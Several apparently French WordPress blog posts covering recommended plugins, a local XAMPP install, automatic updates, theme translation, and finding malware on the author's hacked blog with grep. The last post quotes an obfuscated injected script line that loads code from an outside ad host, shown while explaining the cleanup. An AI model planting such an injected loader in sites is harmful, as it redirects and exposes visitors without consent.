S’il n’est pas le plus utilisé, WordPress est parmi les CMS ou SGC le plus utilisé sur la toile. Grâce à son extensibilité, plusieurs plugins, extensions ou addons peuvent être ajoutés à une installation WordPress pour ajouter des fonctionnalités.

Vu que le nombre des extensions ajoutées dans une installation WordPress influence sa performance, avec autant des plugins gratuits ou payants que regorge WordPress plugin, on ne peut malheureusement pas tous les installer. Et c’est tout à fait naturel de se sentir perdu quant au choix des plugins à utiliser pour son projet WordPress. Quel est le meilleur plugin WordPress, Quel plugin indispensable pour son blog ? Combien de plugins utilisés pour un site ?

Bref, sur base de mon expérience, je vous liste les meilleurs plugins WordPress que quasi tout le monde installent dans son blog WordPress. Ces plugins sont ceux que j’installe dans quasi toutes mes installations WordPress peu importe le type du site.

JetPack

Jetpack, un all in on, est un plugin qui regroupe plusieurs plugins en lui seul, et permet d’intégrer plusieurs fonctionnalités rapidement. Parmi ses fonctionnalités, on cite notamment :

  • Stats: une fonctionnalité qui vous permet d’afficher la statistique de votre site, le nombre de visiteurs journalier, hebdomadaire, mensuel et annuel
  • Abonnement : une newsletter, qui permet à vos fans de s’abonner à votre site et d’être notifié des nouvelles de votre blog
  • Bouton partage : Une fonctionnalité qui permet d’ajouter les boutons de partages dans les réseaux sociaux.
  • Photon : Un outil qui accélère considérablement votre site en chargeant les images depuis wordpress.com
  • Articles similaires : Une fonctionnalité qui permet d’afficher les articles similaire d’un blog
Jetpack by WordPress.com
Jetpack by WordPress.com
Développeur: Automattic
Prix: Gratuit
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran
  • Jetpack by WordPress.com Capture d'écran

Wordfence security

D’abord la sécurité de son blog est primordiale avant quoi que ce soit, Wordfence rend le succès des attaque par force brute difficile si pas impossible avec un système de blacklistage d’adresse IP. Très pratique même s’il a une réputation d’être difficile à configurer.

Akismet

La plus part du temps, les sites WordPress acceptent l’interactivité de ses utilisateurs. Les spammeurs adorent ce genre d’opportunité. Si vous ne voulez pas voir du chinois dans vos commentaires, pensez à Akismet. Il est d’ailleurs déjà intégré par défaut dans toutes les installations WordPress, qui cependant n’est pas activé.

Akismet Anti-Spam
Akismet Anti-Spam
Développeur: Automattic
Prix: Gratuit

W3 Total Cache

Optimise et accélère les chargements de votre site WordPress, il compresse votre site, mets un système de cache et dispose d’une manière intelligente de minifier le code source de votre site pour un chargement plus rapide.

W3 Total Cache
W3 Total Cache
Développeur: Frederick Townes
Prix: Gratuit

Yoas SEO (WordPress SEO by Yoast)

Parmi les étapes de créations d’un site web, le référencement (SEO) de son site est une étape non négligeable si pas indispensable. La plus part de thème WordPress intègre déjà les balises d’optimisation pour les moteurs de recherches mais ne sont généralement pas suffisant. Ce plugin ajoute plusieurs éléments non négligeables pour le référencement naturel dont :

  • Le fichier sitemap qui liste automatiquement toutes les pages du site, à soumettre à Google
  • Défini les balises métas open graph pour les réseaux sociaux
  • Génère un fichier robots.txt
  • Permet l’édition des balises title et metas des pages, des catégories et des articles

Et ce n’est pas tout, il met à votre disposition un indicateur qui sur base de plusieurs critères du mot clé principal (sa densité, sa position, etc.) vous indique le niveau d’une page optimisée.

Yoast SEO
Yoast SEO
Développeur: Team Yoast
Prix: Gratuit
  • Yoast SEO Capture d'écran
  • Yoast SEO Capture d'écran
  • Yoast SEO Capture d'écran
  • Yoast SEO Capture d'écran
  • Yoast SEO Capture d'écran
  • Yoast SEO Capture d'écran

Broken Link Checker

Ce plugin vous alerte via email ou le tableau de bord WordPress sur les liens externes morts. Des liens qu’il faut à tout prix éviter pour la réputation de votre site tant pour vos visiteurs que pour les moteurs de recherches. N’est-ce-pas que c’est chiant d’être dans un site où les liens externes vous redirigent dans des belles pages d’erreurs 404 ?

Broken Link Checker
Broken Link Checker
Développeur:
Prix: Gratuit

Google analytics for WordPress

Vous voulez intégrer Google analytic pour surveiller l’audience de votre site, ce plugin permet rapidement et facilement d’intégrer Google analytic.

Advanced ads

Advanced ads est un plugin qui vous permet aisément d’intégrer les blocs d’annonces dans votre site ou blog. Plusieurs régies publicitaires sont supportés dont Adsense aussi, Il se différence des autres extensions du genre surtout par sa possibilité de gérer un espace de publicité avec l’alternance.

Inline Related posts

Un plugin très pratique qui affiche automatiquement les articles ou posts similaires au sein d’un article. Cela permet de booster les pages vues d’un site web et enfin de mieux optimiser les liens internes du site.

Inline Related Posts
Inline Related Posts
Développeur: IntellyWP
Prix: Gratuit
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran
  • Inline Related Posts Capture d'écran

Q2W3 Fixed Widget

Quickfixed widget est une extension qui permet de mettre vos widgets en position fixed lors du scrolling ! Très pratique dans les pages très longues où on n’aimerait pas qu’une information affichée en haut de la page ne soit pas invisible aux yeux d’un visiteur quand il scroll !

Q2W3 Fixed Widget
Q2W3 Fixed Widget
Développeur: Max Bond
Prix: Gratuit

Enfin, vous savez mes outils ! Et vous, quel plugin trouvez-vous intéressant ou indispensable dans un projet WordPress ?

WordPress est sans nul doute le CMS le plus utilisé actuellement. il gagne ce marché surtout pour sa facilité, sa flexibilité et surtout la possibilité de faire son développement localement.

Voici dans cet article comment installer wordpress de manière professionnelle en locale

Installation du serveur web

On va se servir de Apache, Php et MySQL et pour se simplifier la tâche en tous et pour tout, nous allons utiliser un All in One. Je préfère Xamp mais vous pouvez utiliser wamp ou EasyPHP

  1. Télécharger et installer Xamp

Configuration du serveur web

Création de projet

De manière professionnelle, on aura tendance à travailler sur plusieurs projets. Et donc, créons un dossier pour ce projet aussi.

  1. Aller dans C:\xampp\htdocs
  2. Et créer un répertoire avec le nom de votre projet. C:\xampp\htdocs\monprojet

Configuration système

L’environnement local doit chercher à tout pris se ressembler à celui de la production pour éviter les complications lors du déploiement. Nous allons enregistrer un nom de domaine locale correspondant au nom de domaine de production. bref, on évite à tout pris une adresse comme  http://localhost/monprojet. au lieu de ça, avoir un vrai url comme http://monprojet.com mais sans avoir besoin d’internet.

Pour cela :

    1. Copier le fichier C:\windows\system32\drivers\etc\hosts dans votre bureau
    2. Ouvrir le fichier hosts du bureau et ajouter à la fin à la ligne

      Où monprojet.com est à remplacer avec le nom de domaine de votre site en production
    3. Recopier le fichier modifié dans C:\windows\system32\drivers\etc\hosts

Apache

Après avoir développé un site wordpress localement, le plus dure revient à le rendre disponible en ligne. ça demande tant de configuration telle que :

  • Désactiver les plugins
  • Exporter la base de données locale
  • Modifier les urls pour l’adapter au nom de domaine

Bref, il y possibilité d’éviter tout ça dès l’installation locale de wordpress. Pour cela nous allons utiliser les hôtes virtuels d’apache.

  1. Avec Xampp, Ouvrir le fichier C:\xampp\apache\conf\extra\httpd-vhosts.conf
  2. Ajouter ces lignes à la fin

    Cela permet de configurer le serveur pour qu’il puisse, quand on essaye de se connecter sur le site avec nomdedomaine.com, amorcer directement les fichiers qui se trouvent dans le dossier C:\xampp\htdocs\monprojet comme localhost le fait avec C:\xampp\htdocs
    Rappel : Remplacer donc monprojet.com par le nom de domaine de votre site quand il sera en ligne
  3. Redémarrer le serveur web ou arrêter puis relancer celui ci

Téléchargement et installation WordPress en local

Création de la base de données

Pour créer la base de données, nous allons nous servir de Phpmyadmin. Depuis votre navigateur, si vous utilisez comme moi xampp, allez dans http://localhost/phpmyadmin

creation-bsae-données-wordpress

  1. Cliquez dans base de données
  2. Taper le nom de la base de données, généralement on tape le nom du projet comme étant le nom de la base de données
  3. Cliquez sur “créer” pour créer la base de données

Installation WordPress

Rendez-vous dans cette adresse et téléchargez la dernière version de WordPress et :

  1. Décompressez-le
  2. Placez les fichiers extraits dans le répertoire C\xampp\htdocs\monprojet. Faites en sorte que les fichiers et dossiers (wp-content, wp-includes, wp-admin…) soient directement dans le dossier monprojet et non dans le projet wordpress.
  3. Visitez directement http://monprojet.com (à remplacer à ce que vous avez mis dans le fichier hosts) et cliquez sur “C’est parti !”
  4. Complétez les informations en adaptant avec l’image ci-dessous et cliquez sur “Valider”. le nom de la base de données est la base de données que vous avez créée, l’identifiant, c’est l’identifiant du serveur de la base de données, par défaut c’est root et le mot de passe par défaut c’est vide !
    wordpress-local
  5. Dans la page suivante, cliquer sur “lancer l’installation”. WordPress procédera à la création des tables et configuration des paramètres par défaut !
  6. Et dans cette étape, configurez votre site et après vous n’avez qu’à cliquer sur “Installer wordpress”

wordpress local

Félicitation ! Vous venez professionnellement d’installer WordPress localement ! Il ne vous reste plus qu’à vous connecter http://monprojet.com/wp-admin dans votre tableau de bord dans  avec les identifiants que vous venez de choisir ci-dessus.

Conclusion

Très subtile ce qu’on a fait de spécial, mais en réalité, Installer WordPress de cette manière vous fait gagner un gain quand vous voudriez déployer le site ! Vous n’auriez qu”à utiliser votre client ftp et envoyez les fichiers du site chez votre hébergeur et importer la base de données telle qu’elle est localement chez votre hébergeur sans travail additionnel !

Un informaticien de nature est une personne très très fainéante. Nous cherchons à se faciliter la tâche qu’un jours, j’en suis fortement persuadé qu’on ferra à ce qu’un bot (créé), fasse notre quotidien à notre place. (se mettre debout, manger, se soulager, draguer une meuf).

WordPress, un système de gestion de contenu utilisé par plusieurs sites web (y compris ce blog), permet de créer facilement et rapidement des sites web. Avec son système extensible, tout le monde en sachant programmer peut ajouter ses propres fonctionnalités (extension) qu’on appelle “plugins“..

Pour ceux qui créent déjà leurs sites web avec WordPress, ils savent que les plugins et thèmes ont besoin d’être mise à jours et savent aussi que c’est un “sale job”, le faire manuellement et surtout que de fois on reste pas figé à attendre qu’une mise à jour soit disponible pour le faire directement. Dans cet article, je vous montre comment ne plus s’inquiéter de ça et activer pour une fois, et laissez que toutes les mise à jours se fassent automatiques .

Activer les mise à jours automatique pour les thèmes

Il est très simple de dire à wordpress de mettre automatiquement les thèmes à jours une fois que les mise à jours sont disponibles. Pour activer cette fonctionnalité, il suffit simplement d’ouvrir le fichier functions.php de votre thème dans wp-content/themes/votretheme et d’ajouter cette ligne

Activer les mise à jours automatique pour les plugins

Sachez que
Il faut vraiment bien réfléchir sur la mise à jours automatique de plugins. Parce que certaines plugins deviennent incompatible selon une version de wordpress donnée.  

De même pour les thèmes, pour les plugins, il faut ajouter dans le fichier functions.php dans votre thème

Plugins pour mettre à jours automatique les plugins

Pour ceux qui le code ne leur dit peu, sachez qu’il est aussi possible avec l’extension Jetpack  de le faire de manière intuitive, mais hormis ça, certains plugins vous facilite aussi la tâche comme

  1. Automatique plugin updates
  2. Auto update plugins

Traduire un thème WordPress était autre fois quelque chose de vraiment compliquer, pour certains bien-sûr, en passant par Poedit un éditeur de texte permettant la modification, ainsi il fallait juste compléter toutes les msgstr vide par une traduction et on pouvait enfin obtenir la traduction du thème. Elle est toujours d’actualité cette méthode, mais devient difficile à gérer, le problème étant la difficulté pour voir quels sont les chaines traduites, brouillons ou non traduites. Vous pouvez maintenant oublier Poedit, passez à l’outil Translator Toolkit de Google.

C’est quoi un fichier po ?

C’est un fichier ayant le texte Anglais d’origine et aucune information sur la langue ou les traductions. Les fichiers PO sont créés à partir des fichiers POT.

Comment traduire un fichier po avec Translator Toolkit

Traduire avec Translator Toolkit reste très pratique pour ceux-là dont la langue de shakespeare est un réel problème, puisque l’outil se contente de tout traduire à votre place, pendant ce temps, vous avez droit à une petite dégustation café. Alors, comment faire ?

  1. Vous devez vous rendre à cette adresse Google Translator Toolkit.
  2. Importer votre fichier .po en cliquant sur le bouton importer à la colonne gauche du site (pendant l’importation, vous allez devoir remplir quelques détails, regardez juste cette image ci-dessous).translator toolkit
  3. Ici, on vous demande de passer une commande pour la traduction, pas besoin, cliquez juste sur non, merci. Et on continue.translator toolkit
  4. Votre fichier est en cours pour la traduction, cliquez dessus pour accéder à la page d’édition.translator toolkit
  5. Cliquez sur le bouton terminé en bleu et un pop-up devrait s’afficher avec un message comme ceci : “Voulez-vous vraiment marquer ce document comme étant terminé ?”, cliquez sur oui.
  6. Cliquez sur l’onglet fichier puis sur télécharger. translator toolkit

Si vous êtes parvenu à télécharger votre fichier de traduction, je vous félicite. Vous allez où comme ça ? Vous devez envoyer ce fichier dans le dossier langage de votre thème WordPress, utilisez un client FTP pour le faire.

 

 

Heureux de vous retrouver de nouveau ! Vous savez peut-être faire des recherches dans votre PC pour retrouver les fichiers qui se trouvent dans votre disque dur mais pas chercher les caractères qui se trouvent dans les fichiers de votre disques durs. Vous vous demanderiez peut-être c’est quoi l’intérêt de chercher ce qui se trouve dans un fichier… Ayez la réponse dans mon exemple simple.
Récemment, vous ne l’avez peut être pas remarqué mais ce blog (Informagenie) était piraté. Ce qui se faisait était que tous les visiteurs qui venait dans ce blog par biais (Referer) d’une autre site était redirigé dans un autre lien (a.c0594.com/?tz=1) diffusant des pubs.  Je croyais que c’était dû à l’hébergement gratuit. Mais en changeant d’hébergeur, ce comportement n’avait pas changé. Du coup j’ai perdu beaucoup de visiteurs venant des moteurs de recherches, des réseaux sociaux.

Un peu d’analyse (et des recherches) m’a emmené au script a.c0594.com/?js=1 et dans les codes s’écrivait dans la source document.writeln('<'+'scr'+'ipt type="text/javascript" src="https://a.c'+'0594.com/?js=1"></'+'scr'+'ipt>'); se trouvait forcement dans l’un de mes scripts WordPress. Alors ouvrir un par un  les fichiers (Des plugins, thèmes et cores) du blog (Plus de 100000 fichiers) avec des milieux de lignes de codes, vous savez comment ça gène ?

Aujourd’hui je vous parle d’un outil qui m’a récemment sauvé la vie. Une commande Linux grep qui vous sauvera peut aussi peut-être un jour la vie.

grep est un programme s’exécutant en ligne de commande et qui permet de faire des recherches (extraire, trier et filtrer) dans le fichier. C’est avec celui que j’ai enfin reconnu le but de l’informatique aux humanités (Éviter les travails répétitifs et fastidieux).

Grep sous Windows, Linux, Mac et Android

Le mieux est que vous pouvez utiliser la commande grep dans quasi tous les OS. Grep sst disponible dans tous ces plateforme. Je vous montre comment l’utiliser depuis Android pour la porté de tous mais pour Windows j’utilise mingw-w64, pour linux et Mac OS c’est déjà préinstallé et pour Android, installer terminal emulator et busybox.

Utilisation de grep

Je ne peux malheureusement pas ici vous faire le tours d’utilisation de cette commande. Je vous montre juste comment j’ai {fixé | règlé} le problème de redirection vers a.c0594.com/?j=1 sous wordpress et pour la suite, Ce tutoriel d’openclassrooms vous sera le plus complet et s’adaptera même dans Android.

Pour fixer mon problème, je me suis placé dans la racine de mes fichiers WordPress et j’ai exécuté la commande

  1. grep : La commande
  2. -r : est l’argument récursif qui veut dire, chercher dans tous les fichiers de tous les dossiers et les sous-dossiers
  3. 0594.com/?js=1” : est juste le caractère susceptible d’être dans l’un de ces fichiers

Et au bout d’environ 3 minutes j’ai eu le résultat complet. Le code malicieux se trouvait dans le fichier jquery.js dans le l’arborescence wp-include/js/jquery/jquery.js . C’était dans le cœur même du WordPress où je n’aurez même pas l’idée de commencer avec s’il fallait voir un à un les fichiers.